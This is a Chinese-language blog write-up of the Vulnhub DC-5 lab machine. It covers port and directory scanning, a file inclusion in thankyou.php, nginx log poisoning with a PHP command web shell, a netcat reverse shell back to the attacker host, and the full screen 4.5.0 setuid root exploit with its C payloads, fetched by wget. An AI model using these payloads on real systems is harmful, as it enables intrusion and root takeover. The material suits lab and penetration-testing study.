天道酬勤

【Vulnhub】— DC-5

主机发现

利用netdiscover发现主机,192.168.203.130

端口扫描

利用Nmap

root@kali:~# nmap -sV -A 192.168.203.130 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-14 09:58 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.203.130
Host is up (0.00043s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE VERSION
80/tcp  open  http    nginx 1.6.2
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.203.130
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.203.130:80/contact.php
|     Form id: fname
|_    Form action: thankyou.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: nginx/1.6.2
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
111/tcp open  rpcbind 2-4 (RPC #100000)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          34063/udp   status
|   100024  1          40695/tcp   status
|   100024  1          45211/udp6  status
|_  100024  1          51852/tcp6  status
MAC Address: 00:0C:29:02:DC:93 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.43 ms 192.168.203.130

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.29 seconds

nmap只扫出了80端口和111端口。

寻找Flag

我们先去80端口看一下web服务。

发现其就是一个普通的网站,也没有CMS,尝试扫一下目录。

目录扫描

利用kali中自带的dirb

root@kali:~/桌面# dirb http://192.168.203.130/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Feb 14 10:07:48 2020
URL_BASE: http://192.168.203.130/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.203.130/ ----
==> DIRECTORY: http://192.168.203.130/css/                                     
==> DIRECTORY: http://192.168.203.130/images/                                  
+ http://192.168.203.130/index.php (CODE:200|SIZE:4025)                        
                                                                               
---- Entering directory: http://192.168.203.130/css/ ----
                                                                               
---- Entering directory: http://192.168.203.130/images/ ----
                                                                               
-----------------
END_TIME: Fri Feb 14 10:07:56 2020
DOWNLOADED: 13836 - FOUND: 1

发现啥也没有。


思路再次返回到网站页面,唯一有交互的就是网站的Contact部分。

这里我们可以提交一些内容。

……感觉也没啥可以利用的啊。

按照做靶机的惯性思路,这是一台linux机器,应该开22端口的,但是没有开,这可能是修改了端口,于是我决定再重新扫一下端口。

利用命令 nmap -sV -p 1-65535 192.168.203.130

果然!!多了一个40695端口。

尝试利用telnet连接此端口,无果。


一下子……思路断了。

看了下大佬的提示,问题果然还是出在web服务里,那个提交页面。

当我们提交一个内容之后,会跳转到thankyou.php

每当我们刷新一次,最底下的Copyright就会变化一次。

那为什么会出现这种情况呢?

文件包含漏洞

这里我们要讲到一个知识点,就是footer.php

凡是建过站的朋友应该都知道,footer.php,它会输出网站的页脚信息,网站页面最下面的版权等其他关于网站的内容。所以在网站的根目下下会存在footer.php

那我们访问一下看看:

可以看到确实是存在的,并且每刷新一次,数字就变化一次。

那这样的话就讲的通了,thankyou.php存在文件包含,且在默认情况下包含footer.php

接下里,验证漏洞的存在。包含/etc/passwd

包含成功!

利用漏洞

通过谷歌浏览器的插件,得知中间件为Nginx。

那我们可利用nginx的日志功能,将错误信息写入日志,以获取shell。

我先写一个phpinfo,看是否利用成功。

<?php phpinfo();?>

利用成功。

那再直接写个利用系统命令的

<?php system($_GET['cmd']);?>

nc 192.168.203.129 7777 -e /bin/bash

直接在url中访问:

[http://192.168.203.130/thankyou.php?file=/var/log/nginx/access.log&cmd=nc 192.168.203.129 7777 -e /bin/bash

便反弹得到shell。

看了网站根目录,catfooter.php

如我所料,默认包含footer.php

提权

find / -user root -perm -4000 -print 2>/dev/null

发现一个screen。

利用searchsploit寻找一下:

主要看一下41154.sh:

root@kali:~# cat 41154.sh
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017) 
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so... 

按照说明,我们需要将:

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}

保存为libhax.c

将:

#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}

保存为rootshell.c

然后,我们按照要求进行编译。

gcc -fPIC -shared -ldl -o libhax.so  libhax.c
gcc -o rootshell rootshell.c

使用wget命令,将上述两个编译好的文件置入目标服务器的/tmp目录下:

www-data@dc-5:/tmp$ wget 192.168.203.129:8080/libhax.so
wget 192.168.203.129:8080/libhax.so
converted 'http://192.168.203.129:8080/libhax.so' (ANSI_X3.4-1968) -> 'http://192.168.203.129:8080/libhax.so' (UTF-8)
--2020-02-14 22:25:48--  http://192.168.203.129:8080/libhax.so
Connecting to 192.168.203.129:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16144 (16K) [application/octet-stream]
Saving to: 'libhax.so'

libhax.so           100%[=====================>]  15.77K  --.-KB/s   in 0s     

2020-02-14 22:25:48 (531 MB/s) - 'libhax.so' saved [16144/16144]

-----------------------------------------------------------------------------------
www-data@dc-5:/tmp$ wget http://192.168.203.129:8080/rootshell
wget http://192.168.203.129:8080/rootshell
converted 'http://192.168.203.129:8080/rootshell' (ANSI_X3.4-1968) -> 'http://192.168.203.129:8080/rootshell' (UTF-8)
--2020-02-14 22:24:42--  http://192.168.203.129:8080/rootshell
Connecting to 192.168.203.129:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16832 (16K) [application/octet-stream]
Saving to: 'rootshell'

rootshell           100%[=====================>]  16.44K  --.-KB/s   in 0s 

然后继续在目标机器上执行脚本中剩下的命令:

cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so... 

最终再返回/tmp中执行rootshell,即可获取root的shell。

www-data@dc-5:/tmp$ cd /etc
cd /etc
www-data@dc-5:/etc$ umask 000
umask 000
www-data@dc-5:/etc$ screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"
<-D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"                       
www-data@dc-5:/etc$ echo "[+] Triggering..."
echo "[+] Triggering..."
[+] Triggering...
www-data@dc-5:/etc$ screen -ls
screen -ls
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

www-data@dc-5:/etc$ cd /tmp
cd /tmp
www-data@dc-5:/tmp$ ./roots	
./rootshell 
# whoami
whoami
root
# 
-------------------------------------------------------------------------------
# cd /root
cd /root
# ls
ls
thisistheflag.txt
# cat thisistheflag.txt
cat thisistheflag.txt


888b    888 d8b                                                      888      888 888 888 
8888b   888 Y8P                                                      888      888 888 888 
88888b  888                                                          888      888 888 888 
888Y88b 888 888  .d8888b .d88b.       888  888  888  .d88b.  888d888 888  888 888 888 888 
888 Y88b888 888 d88P"   d8P  Y8b      888  888  888 d88""88b 888P"   888 .88P 888 888 888 
888  Y88888 888 888     88888888      888  888  888 888  888 888     888888K  Y8P Y8P Y8P 
888   Y8888 888 Y88b.   Y8b.          Y88b 888 d88P Y88..88P 888     888 "88b  "   "   "  
888    Y888 888  "Y8888P "Y8888        "Y8888888P"   "Y88P"  888     888  888 888 888 888 
                                                                                          
                                                                                          


Once again, a big thanks to all those who do these little challenges,
and especially all those who give me feedback - again, it's all greatly
appreciated.  :-)

I also want to send a big thanks to all those who find the vulnerabilities
and create the exploits that make these challenges possible.

 

 

赞(0) 打赏
未经允许不得转载:HackerGu‘s Blog » 【Vulnhub】— DC-5
分享到: 更多 (0)

评论 抢沙发

评论前必须登录!

 

专注黑客技术的研究

联系我们联系我们

觉得文章有用就打赏一下文章作者

微信扫一扫打赏